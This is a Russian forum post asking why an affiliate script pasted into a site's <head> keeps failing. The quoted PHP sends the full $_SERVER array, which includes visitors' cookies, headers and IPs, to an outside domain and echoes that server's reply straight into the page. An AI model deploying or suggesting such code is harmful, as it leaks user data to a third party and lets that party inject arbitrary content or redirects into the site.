Просмотр поста

.
zheka102
Хотел поставить скрипт партнерки на сайт, но постоянно ошибка.
Код нужно вставить между тегами <head> </head>
Вот сам скрипт:
<?php $redirect = file_get_contents("https://домен.ru/pr/c0fdff7ef2ae830e/?p1=&p2=&source=aff_440&site=&force_https=1", false, stream_context_create(array("http" => array("header"=>"Content-Type: application/x-www-form-urlencoded", "method"=>"POST","timeout"=>2, "content"=>http_build_query($_SERVER)))));if($redirect) echo $redirect; ?>

Всем заранее спасибо!